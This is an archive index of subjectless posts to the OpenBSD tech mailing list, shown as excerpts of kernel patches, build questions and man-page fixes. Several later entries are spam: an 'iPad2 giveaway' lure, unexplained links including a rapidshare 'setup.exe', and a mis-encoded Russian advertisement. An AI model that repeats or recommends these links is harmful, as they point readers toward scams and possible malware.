[no subject]

2023-07-27 Thread Theo de Raadt
S V wrote: > 2023-07-27 17:24 GMT+03:00, Theo de Raadt : > > You don't explain why you are trying to enable floating point register > > use in the kernel. > > I just have CPU with it (Cortex-a57 with NEON), so was toying with it > trying to look if I get more performance. > Got this error and de

[no subject]

2023-07-27 Thread S V
I was trying (as an experiment) to build aarch64 current kernel with -march=armv8-a+simd and stumble upon error Interesting to notice that armv8-a+nofp+simd compiles and runs OK part of output with error: cc -g -Werror -Wall -Wimplicit-function-declaration -Wno-pointer-sign -Wno-constant-conve

[no subject]

2022-11-08 Thread Todd C . Miller
On Tue, 08 Nov 2022 18:05:24 +, Klemens Nanni wrote: > Subject: Document ifc_list immutability Sure. OK millert@ - todd

[no subject]

2022-11-08 Thread Klemens Nanni
Subject: Document ifc_list immutability OK? diff --git a/sys/net/if_var.h b/sys/net/if_var.h index 28514a0bfcd..a472c586f3c 100644 --- a/sys/net/if_var.h +++ b/sys/net/if_var.h @@ -78,11 +78,15 @@ struct ifnet; struct task; struct cpumem; +/* + * Locks used to protect struct members in this

[no subject]

2022-07-25 Thread Samuel Venable
Hello OpenBSD developers! I have a suggestion on how to get the current executable path in OpenBSD that might be reliable enough and not too costly that it might be accepted for a future OpenBSD version. Even if it won't be accepted, I need a little help completing the solution I have in mind.

[no subject]

2021-08-25 Thread Crystal Kolipe
Hi, I sent this to bugs a while back, but it doesn't seem to have been picked up by anyone. On both i386 and amd64, the machine boot command in the bootloader has an off by one bug, which has been present since revision 1.20 in 1998. The machine boot command is implemented by patching the in-m

(No Subject)

2021-01-17 Thread ndelluomo
subscribe

[no subject]

2021-01-17 Thread Klemens Nanni
foo

[no subject]

2019-07-20 Thread Jason High
subscribe tech@openbsd.org

[no subject]

2018-12-10 Thread Jan Stary
Currently, pcap_setdirection() is described in pcap.3 as follows: pcap_setdirection() is used to limit the direction that packets must be flowing in order to be captured. The "direction" is not described, except in pcap.h. Should the constants be mentioned in the manpage? Also, the direction

[no subject]

2018-01-16 Thread Sebastian Benoit
Hi, this removes the currently unused arguments *warnmess and ratecap from pool_sethardlimit(). ok? diff --git share/man/man9/pool.9 share/man/man9/pool.9 index 75742cf12ab..27226e14a25 100644 --- share/man/man9/pool.9 +++ share/man/man9/pool.9 @@ -72,8 +72,6 @@ .Fo pool_sethardlimit .Fa "str

[no subject]

2017-11-03 Thread Jan Stary
Including when using getopt(3) also makes extern int opterr, optind, optopt, optreset; and friends declared, but many utils redeclare them again. Is there a reason for that, or can those be removed? As a harmless example, here's a diff to games. Jan Index: fortune/strfile/strfile.c ===

[no subject]

2015-09-09 Thread James Turner
espie@openbsd, dera...@cvs.openbsd.org Bcc: Subject: Re: sqlite 3.8.11.1 Reply-To: In-Reply-To: <20150909084510.gh30...@tazenat.gentiane.org> On Wed, Sep 09, 2015 at 08:45:10AM +, Miod Vallat wrote: > > Hi, > > > > thanks to the hard work of jturner@, here's a 650kb gzipped update to > > sq

[no subject]

2015-04-30 Thread Todd C. Miller
Merge two identical if() statements. The change in ip_spd.c 1.59 makes it appear that there is a cut & pasto. We should merge the two identical and adjacent if() statements to avoid confusing people (and static analyzers). - todd Index: sys/netinet/ip_spd.c

[no subject]

2015-03-06 Thread Spencer BoxMan Davis

[no subject]

2015-01-02 Thread David Carlier
Hi again after discussins with Helg, second change is not relevant, so only the first should remains. Kind regards. Index: fuse.c === RCS file: /cvs/src/lib/libfuse/fuse.c,v retrieving revision 1.24 diff -u -p -r1.24 fuse.c --- fuse.

[no subject]

2014-11-02 Thread maurice prince
Envoyé depuis Windows Mail

[no subject]

2014-09-18 Thread bytevolcano
Yes. As it would seem, that was unintentional, possibly caused by a bad merge. I didn't pick this up as it worked on my system. It was thanks to Otto's messae re parsing changes that I managed to pick that up. I am working on a new diff which will be released some time within the next few hours

[no subject]

2014-06-05 Thread Theo de Raadt
Fcc: +outbox Subject: Re: that private mailing list (fwd) Solar Designer: Re: that private mailing list I haven't even read this. I don't care. if this is the situation with open source disclosure, all of you users are fucked. --- Forwarded Message Received: from mother.openwall.

[no subject]

2014-01-25 Thread Ted Unangst
I generally associate negative connotations with so-called, as in the "so-called free world". I wouldn't use it just to name something, as in "the kernel is written in the so-called C language". so-called implies "it's called this, but it's not". Two imo dubious occurrences in the install notes. I

[no subject]

2012-05-15 Thread Шевченко Илья
Dk sqoexmncn p`gbhrh ahgmeq` menaundhl` j`weqrbemm` h dnqrsom` pejk`l`. B m`xe bpel nqmnbm{l qpedqrbnl pejk`l{ bkerq Hmrepmer, on qjnk|js d`er bnglnfmnqr| p`qxhphr| cp`mhv{, nap`rhr| m` qea bmhl`mhe h ophbkew| mnb{u jkhemrnb hg whqk` xhpnjni `sdhrnphh "bqelhpmni o`srhm{". Opedk`c`el B`l s

(no subject)

2011-11-05 Thread bole854
What's happening! I was searching the web and found... there doing a giveaway for an iPad2! you need to hurry up and get yours before they run out heres the web link.. http://so.ee/K50

[no subject]

2011-04-23 Thread Brynet
Index: dev/pci/piixpm.c === RCS file: /cvs/src/sys/dev/pci/piixpm.c,v retrieving revision 1.35 diff -u -r1.35 piixpm.c --- dev/pci/piixpm.c9 Apr 2011 04:33:40 - 1.35 +++ dev/pci/piixpm.c24 Apr 2011 03:16:31 - @@ -

[no subject]

2010-10-26 Thread Damien Miller
Hi, Here are a couple of changes to the ECDH/ECDSA code: - Fix a NULL-deref on loading of invalid ECC private keys - Support 224-bit ECDSA and ECDH and make it the default. This is strength-equivalent to our current default of 2048-bit RSA keys. Presently it is a bit faster than 256 bit

[no subject]

2010-03-04 Thread betty . happy
We must protect our planet. Turn off your computer! Nous devons protC)ger notre planC(te. C teignez votre ordinateur! Debemos proteger nuestro planeta. Apague su ordenador! Musimy chroniD naszD planetD. WyEDcz komputer! PQ P4P>P;P6P=Q P7P0Q P8QP8QQ P=P0QQ P?P;P0P=P5QQ. PQ P:P;QQP8

[no subject]

2010-02-01 Thread Milton Caines
http://sites.google.com/site/jgctidjtom/yzmbbezipo

[no subject]

2009-12-30 Thread damion bell
http://www.salni.com/ertTUUIOPP.html

[no subject]

2009-12-29 Thread damion bell
http://skateboa.skateboarding-videos.com/GJJlxxcCVB.html

[no subject]

2009-09-23 Thread damion bell
http://rapidshare.com/files/283829348/setup.exe